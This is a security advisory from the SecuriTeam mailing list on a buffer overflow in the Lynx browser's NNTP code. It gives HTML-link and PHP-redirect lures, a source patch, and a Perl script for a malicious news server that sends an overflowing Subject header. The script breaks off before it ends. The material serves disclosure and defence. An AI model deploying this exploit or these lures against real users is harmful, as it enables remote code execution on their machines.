[UNIX] Lynx NNTP Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Lynx NNTP Buffer Overflow
------------------------------------------------------------------------

SUMMARY

" <http://lynx.isc.org/> Lynx is a fully-featured World Wide Web (WWW)
client for users running cursor-addressable, character-cell display
devices (e.g. vt100 terminals, vt100 emulators running on PCs or Macs, or
any other character-cell display)."

Lynx does not verify the length of buffer it copies allowing remote
attackers to execute arbitrary code using buffer overflow in Lynx's NNTP
support.

DETAILS

Vulnerable Systems:
* Lynx version 2.8.5
* Lynx version 2.8.6dev.13
* Lynx version 2.8.4
* Lynx version 2.8.3
* Lynx version 2.8.2

When Lynx connects to an NNTP server to fetch information about the
available articles in a newsgroup, it will call a function called HTrjis()
with the information from certain article headers. The function adds
missing ESC characters to certain data, to support Asian character sets.
However, it does not check if it writes outside of the char array buf, and
that causes a stack-based buffer overflow, with full control over EIP,
EBX, EBP, ESI and EDI.

Two attack vectors to make a victim visit a URL to a dangerous news server
are: (a) *links in web pages*, where the victim visits some web page and
selects a link on the page to a malicious URL, and (b) *redirecting
scripts*, where the victim visits a URL and it redirects automatically to
a malicious URL. Attack vector (a) is helped by the fact that Lynx does
not automatically display where links lead to, unlike many graphical web
browsers.

Victims are in danger when their Lynx session is forced to visit a URL of
the types "nntp://some.news.server/group.name" or "news:group.name", and
the server that Lynx connects to must send back article headers with
certain malicious data. It may be possible to make real news servers
distribute such articles without technical problems, but that has not been
tested.

Proof of Concept 1:
< html>
< head>
< title>lynx test< /title>
< /head>

< body>
< a href="nntp://malicious.news.server/alt.angst">Click me!< /a>
< /body>
< /html>

Proof of Concept 2:
< ? php

header('Location: nntp://malicious.news.server/alt.angst');

? >

Possible Patch:
--- WWW/Library/Implementation/HTMIME.c.old 2004-01-08 03:03:09.000000000
+0100
+++ WWW/Library/Implementation/HTMIME.c 2005-09-25 17:25:02.499592560
+0200
@@ -2230,7 +2230,7 @@ PUBLIC int HTrjis ARGS2(
strcpy(t, s);
return 1;
}
- for (p = buf; *s; ) {
+ for (p = buf; *s && p < buf + LINE_LENGTH - 8; ) {
if (!kanji && s[0] == '$' && (s[1] == '@' || s[1] == 'B')) {
if (HTmaybekanji((int)s[2], (int)s[3])) {
kanji = 1;
@@ -2253,7 +2253,7 @@ PUBLIC int HTrjis ARGS2(
}
*p++ = *s++;
}
- *p = *s; /* terminate string */
+ *p = '\0'; /* terminate string */

strcpy(t, buf);
return 0;

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3120>
CAN-2005-3120

Exploit:
#!/usr/bin/perl --

# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 119;
$main::timeout = 5;

# *** SUBROUTINES ***

sub mysend($$)
{
my $file = shift;
my $str = shift;

print $file "$str\n";
print "SENT: $str\n";
} # sub mysend

sub myreceive($)
{
my $file = shift;
my $inp;

eval
{
local $SIG{ALRM} = sub { die "alarm\n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};

if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
$inp =~ tr/\015\012\000//d;
print "RECEIVED: $inp\n";
$inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!\n" unless $server;

while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."\n";

mysend($client, '200 Internet News');
my $group = 'alt.angst';

while (my $str = myreceive($client))
{
if ($str =~ m/^mode reader$/i)
{
mysend($client, '200 Internet News');
next;
}

if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
{
$group = $1;
mysend($client, "211 1 1 1 $group");
next;
}

if ($str =~ m/^quit$/i)
{
mysend($client, '205 Goodbye');
last;
}

if ($str =~ m/^head ([0-9]+)$/i)
{
my $evil = '$@UU(JUU' x 21; # Edit the number!
$evil .= 'U' x (504 - length $evil);

my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.